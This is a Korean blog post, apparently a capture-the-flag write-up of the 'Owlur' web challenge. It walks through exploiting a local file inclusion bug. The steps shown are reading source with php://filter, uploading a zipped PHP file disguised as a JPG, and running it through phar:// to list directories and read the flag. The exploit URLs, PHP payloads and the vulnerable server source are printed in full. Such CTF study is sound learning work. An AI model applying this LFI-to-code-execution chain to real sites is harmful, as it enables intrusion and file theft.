티스토리 뷰
□ description
==========================================
http://54.65.205.135/owlur/
if you use a web scanner, your IP will get banned
no bruteforce required, take it easy
==========================================
http://54.64.81.174/owlur/
파일을 업로드할 수 있는 사이트가 있다.
Click here to view a random owl.
here 를 누르면 아래와 같이 부엉이(무작위)를 볼 수 있다.
http://54.64.81.174/owlur/index.php?page=view&id=random
page 파라미터에 view를 입력하면 위 그림과 같이 사진을 볼 수 있고, index를 입력하면 아래 그림과 같이 index 페이지를 볼 수 있다.
page 파라미터를 통해서 PHP 파일들이 실행된다.
이를 통해서 index.php에 Local File Inclusion 취약점이 있다는 것을 알 수 있다.
http://54.64.81.174/owlur/index.php?page=index&id=random
PHP Wrappers 중에서 php://filter 를 이용해서 소스 코드를 확인할 수 있다.
view.php
http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=view
PD9waHAKJHBpYyA9ICRfUkVRVUVTVFsnaWQnXTsKCmlmKCRwaWMgPT0gIiIgfHwgJHBpYyA9PSAicmFuZG9tIikKewokcGljbmFtZSA9ICJwcmVsb2FkZWQtb3dscy8iIC4gcmFuZCgxLDE0KSAuICIuanBnIjsKfQoKZWxzZSAkcGljbmFtZSA9ICIvb3dsLyIgLiAkcGljIC4gIi5qcGciOwoKCgplY2hvICc8aW1nIHNyYz0iJyAuICRwaWNuYW1lIC4gJyI+JzsKCj8+Cg=
|
<?php
$pic = $_REQUEST['id'];
if($pic == "" || $pic == "random")
{
$picname = "preloaded-owls/" . rand(1,14) . ".jpg";
}
else $picname = "/owl/" . $pic . ".jpg";
echo '<img src="' . $picname . '">';
?> |
cs |
upload.php
http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload
PD9waHAKCmZ1bmN0aW9uIFJhbmRvbVN0cmluZygpCnsKICAgICRjaGFyYWN0ZXJzID0gIjAxMjM0NTY3ODlhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ekFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIjsKICAgICRyYW5kc3RyaW5nID0gIiI7CiAgICBmb3IgKCRpID0gMDsgJGkgPCA3OyAkaSsrKSB7CiAgICAgICAgJHJhbmRzdHJpbmcgLj0gJGNoYXJhY3RlcnNbcmFuZCgwLCBzdHJsZW4oJGNoYXJhY3RlcnMpLTEpXTsKICAgIH0KICAgIHJldHVybiAkcmFuZHN0cmluZzsKfQoKJHRhcmdldF9kaXIgPSAiL3Zhci93d3cvb3dsdXIvb3dsdXItdXBsb2FkLXp6enp6ei8iOwokdGFyZ2V0X2ZpbGUgPSAkdGFyZ2V0X2RpciAuIGJhc2VuYW1lKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJuYW1lIl0pOwokdXBsb2FkT2sgPSAwOwokaW1hZ2VGaWxlVHlwZSA9IHBhdGhpbmZvKCR0YXJnZXRfZmlsZSxQQVRISU5GT19FWFRFTlNJT04pOwokZnNpemUgPSAkX0ZJTEVTWydmaWxlVG9VcGxvYWQnXVsnc2l6ZSddOwokbmV3aWQgPSBSYW5kb21TdHJpbmcoKTsKJG5ld25hbWUgPSAkbmV3aWQgLiAiLmpwZyI7CgppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgaWYoJGltYWdlRmlsZVR5cGUgPT0gImpwZyIpIHsKICAgICAgICAkdXBsb2FkT2sgPSAxOwogICAgfSBlbHNlIHsKCWVjaG8gIjxwPlNvcnJ5LCBvbmx5IEpQRyBpbWFnZXMgb2Ygb3dscyB3aWxsIGJlIGFjY2VwdGVkLiBQbGVhc2UgdXNlIGEgZGlmZmVyZW50IHNlcnZpY2UgaWYgeW91IGRvIG5vdCBpbnRlbmQgdG8gdXBsb2FkIG93bCBwaWN0dXJlcy48L3A+IjsKICAgICAgICAkdXBsb2FkT2sgPSAwOwogICAgfQoKICAgIGlmKCEoJGZzaXplID49IDAgJiYgJGZzaXplIDw9IDIwMDAwMCkpIHsKCSR1cGxvYWRPayA9IDA7CgkJZWNobyAiPHA+U29ycnksIHRoZSBzaXplIG9mIHlvdXIgb3dsIHBpY3R1cmUgaXMgbm90IHRvIG91ciBsaWtpbmcuPC9wPiI7Cgl9Cgp9CgppZigkdXBsb2FkT2spCnsKCiRuZXdwYXRoID0gIi92YXIvd3d3L293bHVyL293bHVyLXVwbG9hZC16enp6enovIiAuICRuZXduYW1lOwoKaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlVG9VcGxvYWQiXVsidG1wX25hbWUiXSwgJG5ld3BhdGgpKSB7CgloZWFkZXIoJ0xvY2F0aW9uOiAvb3dsdXIvaW5kZXgucGhwP3BhZ2U9dmlldyZpZD0nIC4gJG5ld2lkKTsKICAgIH0gZWxzZSB7CiAgICAgICAgZWNobyAiPHA+U29ycnksIHRoZXJlIHdhcyBhbiBlcnJvciB1cGxvYWRpbmcgeW91ciBmaWxlLjwvcD4iOwogICAgfQoKfQoKCj8+Cg==
|
<?php
function RandomString()
{
$characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$randstring = "";
for ($i = 0; $i < 7; $i++) {
$randstring .= $characters[rand(0, strlen($characters)-1)];
}
return $randstring;
}
$target_dir = "/var/www/owlur/owlur-upload-zzzzzz/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 0;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
$fsize = $_FILES['fileToUpload']['size'];
$newid = RandomString();
$newname = $newid . ".jpg";
if(isset($_POST["submit"])) {
if($imageFileType == "jpg") {
$uploadOk = 1;
} else {
echo "<p>Sorry, only JPG images of owls will be accepted. Please use a different service if you do not intend to upload owl pictures.</p>";
$uploadOk = 0;
}
if(!($fsize >= 0 && $fsize <= 200000)) {
$uploadOk = 0;
echo "<p>Sorry, the size of your owl picture is not to our liking.</p>";
}
}
if($uploadOk)
{
$newpath = "/var/www/owlur/owlur-upload-zzzzzz/" . $newname;
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $newpath)) {
header('Location: /owlur/index.php?page=view&id=' . $newid);
} else {
echo "<p>Sorry, there was an error uploading your file.</p>";
}
}
?> |
cs |
파일을 업로드 해보면 아래와 같이 된다.
http://54.64.81.174/owlur/index.php?page=view&id=zfqvcDH
upload.php 소스 코드를 보면 파일 확장자에 대해서 .jpg 확인을 하지만, 파일 내용에 대해서는 확인하는 부분이 없다.
공격을 하기 위해서 phar:// 를 이용하였다.
phar:// — PHP Archive
d.php
<?php print_r(scandir('/'))?>
d.php 파일을 압축해준다.
압축된 d.php.zip 파일명을 d.jpg 로 변경해준다.
d.jpg 파일을 업로드하면 아래와 같이 된다.
http://54.64.81.174/owlur/index.php?page=view&id=OoebY7U
변경된 파일명.jpg 파일을 phar:// 을 이용해서 압축을 풀어주고 d.php 파일을 실행한다.
http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/OoebY7U.jpg/d
최상위 디렉터리에 OWLUR_FLAG.txt 파일을 볼 수 있다.
동일한 방법으로 해당 파일의 내용을 읽으면 된다.
o.php
<?php echo file_get_contents('/OWLUR-FLAG.txt')?>
o.php 파일을 압축해준다.
압축된 o.php.zip 파일명을 o.jpg 로 변경해준다.
http://54.64.81.174/owlur/index.php?page=view&id=jnxL8Ja
http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/jnxL8Ja.jpg/o
flag : PHP fILTerZ aR3 c00l buT i pr3f3r f1lt3r 0xc0ffee
<?php echo file_get_contents('/var/www/owlur/index.php')?>
|
<?php
$p = $_REQUEST['page'];
if($p == "" || $p == "index")
{
$p = "main";
}
$haq = base64_decode("ICAgICAgICAgICAgICAgICAgIC8tLS0tLS0tLS0KICAgICAgICAgICAgICAgICAgLyAvIC8qKioqKipcCiAgICAgICAgICAgICAgICAgLyAvKioqKi0tICogKlwKICAgICAgLy8oKCg6PDw8PC86KioqKioqKioqM1xYKlwoKDwKICAgICAvWFgvQ1hDJkNHRy8vKiovLS0vLy9YKlZcKiouLmcmCigvVkNDM2dnMC4uLi4uLi4uKi8vWC8vKC8vL1YqQ1wqLi44ODhnZzhnJjNDPAooMyZnRyYuLi4uLi4uLi4uLiouLlhYWC8oKCgvKi5cKi4uLi4uLi5HLzA4ODgzWDxgCi8oPEM4IC4uLi4uLi4uLi4uKi5YWFhYLy8vLzwvLi4qLi4uLi4uLi4uLi4uLi4uM0NeClgvLzw8Ly4uLi4uLi4uLi4uKiZDVlgvLy9WLzw8Ly4qLi4uLi4uLi4uLi4uLi4uOEdDPApYWC9DLzo8L1YuLi4uLi4uLiomM0NWWFZYVlgoPFYqKi4uLi4uLi4uLi4uLi4uLiBnOENeCiAgICBHQy88PC8oLi4uLi44RyYzQ0NWWFhYWFZ+WFYqLi4uLi4uLi4uLi4uLi4uIEM4M1YKICAgICAgIFYvPF48KFg4OCZWLy8oKDw8PDwoKDxePCoqLi4uLi4uLi4uLi4uLi4uWCYmQwogICAgICAgICAgICAgIGA6L0NDVi8oKCg8PCgvVlZWLyouLi4uLi4uLi4uLi4uLigvQyYvCiAgICAgICAgICAgICAgIDw8IF5eKC9WMzNWWC9WQyZYKlZDLi4uLjo8PH48PDwoKFggIGAKICAgICAgICAgICAgICAgVi8oLzwgXiBeXjovWC8oKDw8Xl4tLS1WOn5+PDwoCiAgICAgICAgICAgICAgMyYgICAgICAgICAgICAgICAgICAuXi0vCiAgICAgICAgICAgICAgQyAgL1wgICAgICAgL1wgICAgICAgIHwKICAgICAgICAgICAgIC9DICBcLyAgICAgICBcLyAgICAgICAvLwogUExaIFNUT1AgICAgIDMgICAgICAgICAgICAgICAgICAgIHxcCiAgIEhBQ0tJTkcgICAgQyAgICAgICAgICAgICAgICAgICAvNSoKICAgICAgICAgICAgICBWICAgICAvLS0tLS1cICAgICAgIC8KICAgICAgICAgICAgICBDRyAgfCAgICAgICAgIHwgIDwvLy88CiAgICAgICAgICAgICAgVkdWIHwgICAgICAgICB8IF4oL1g8XgogICAgICAgICAgICAgICAmJjwgIFwtLS0tLS8gIC4oKDwoXgogICAgICAgICAgICAgICAgODMoICAgICAgICAuPCh+YDw8CiAgICAgICAgICAgICAgICAgOFhgICAgICAuPDxeYCBgKCheCiAgICAgICAgICAgICAgICBCQEBDPC5gXl5gICAgICBeKENHJkMoPC5gYAogICAgIENHOEIkQEBAQEBAQEBAJCggICAgICAgICAgXl4oMEBAQEAkODNYPGAKICAgQkBAQEBAQEBAQEBAQEBAQEBAOC8gICAgICAgYDxDJEBAQEBAQEBAQEAkJjwKICBAQEBAQEBAQEBAQEBAQEAkJCRAQEAkJDA4ODhCQEBAQEBAQEBAQEBAQEBAQEBWYAogQEBAQEBAQEBAQEBAQEAkQCQkJCQkJCRAQEBAJCRAQEAkQEBAQEBAQEBAQEBAQEBDYApAQEBAQEBAQEBAQEBAQCRAJCQkJCQkJCQkJCQkJCQkJCQkQEBAQEBAQEBAQEBAQEBAKGAKQEBAQEBAQEBAQEAkQCQkJCQkJCQkJCQkJCQkQEAkJEBAQEBAQEBAQEBAQEBAQEBAQEIK");
$haq = htmlentities($haq);
if(strstr($p,"..") !== FALSE)
die("<pre>$haq</pre>");
if(stristr($p,"http") !== FALSE)
die("<pre>$haq</pre>");
if(stristr($p,"ftp") !== FALSE)
die("<pre>$haq</pre>");
if(strlen($p) >= 60)
die("<pre>string > 60
$haq</pre>");
$inc = sprintf("%s.php",$p);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Owlur - The simple image sharing website for owl pictures</title>
<!-- Bootstrap -->
<link href="css/bootstrap.min.css" rel="stylesheet">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body style="background-color: #d0d0c8;">
<center>
<h1>owlur</h1>
<?php
include($inc);
?>
</center>
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="js/bootstrap.min.js"></script>
</body>
</html>
|
cs |
|
/---------
/ / /******\
/ /****-- * *\
//(((:<<<</:*********3\X*\((<
/XX/CXC&CGG//**/--///X*V\**..g&
(/VCC3gg0........*//X//(///V*C\*..888gg8g&3C<
(3&gG&...........*..XXX/(((/*.\*.......G/08883X<`
/(<C8 ...........*.XXXX////</..*...............3C^
X//<</...........*&CVX///V/<</.*...............8GC<
XX/C/:</V........*&3CVXVXVX(<V**............... g8C^
GC/<</(.....8G&3CCVXXXXV~XV*............... C83V
V/<^<(X88&V//((<<<<((<^<**...............X&&C
`:/CCV/(((<<(/VVV/*..............(/C&/
<< ^^(/V33VX/VC&X*VC....:<<~<<<((X `
V/(/< ^ ^^:/X/((<<^^---V:~~<<(
3& .^-/
C /\ /\ |
/C \/ \/ //
PLZ STOP 3 |\
HACKING C /5*
V /-----\ /
CG | | <///<
VGV | | ^(/X<^
&&< \-----/ .((<(^
83( .<(~`<<
8X` .<<^` `((^
B@@C<.`^^` ^(CG&C(<.``
CG8B$@@@@@@@@@$( ^^(0@@@@$83X<`
B@@@@@@@@@@@@@@@@@8/ `<C$@@@@@@@@@@$&<
@@@@@@@@@@@@@@@$$$@@@$$0888B@@@@@@@@@@@@@@@@@V`
@@@@@@@@@@@@@@$@$$$$$$$@@@@$$@@@$@@@@@@@@@@@@@@C`
@@@@@@@@@@@@@@$@$$$$$$$$$$$$$$$$$$@@@@@@@@@@@@@@@(`
@@@@@@@@@@@$@$$$$$$$$$$$$$$@@$$@@@@@@@@@@@@@@@@@@B
|
cs |
'CTF (Git으로 이사 예정)' 카테고리의 다른 글
| [SSCTF] Up!Up!Up! - Web (100) (0) | 2016.03.01 |
|---|---|
| [SharifCTF] technews - Web (200) (0) | 2016.02.09 |
| [SharifCTF] PhotoBlog - Web (100) (0) | 2016.02.09 |
| [32C3] ITD - Web (150) (0) | 2016.01.19 |
| [32C3] Sequence Hunt - Web (200) (0) | 2016.01.13 |
| [32C3] Kummerkasten - Web (300) (0) | 2016.01.12 |
| [32C3] TinyHosting - Web (250) (0) | 2016.01.11 |
| [32C3] MonkeyBase - Web (200) (0) | 2016.01.07 |
| [32C3] forth - Pwn (150) (0) | 2016.01.03 |
| [CODEGATE2015] Owltube - Web (400 Point) (0) | 2015.03.16 |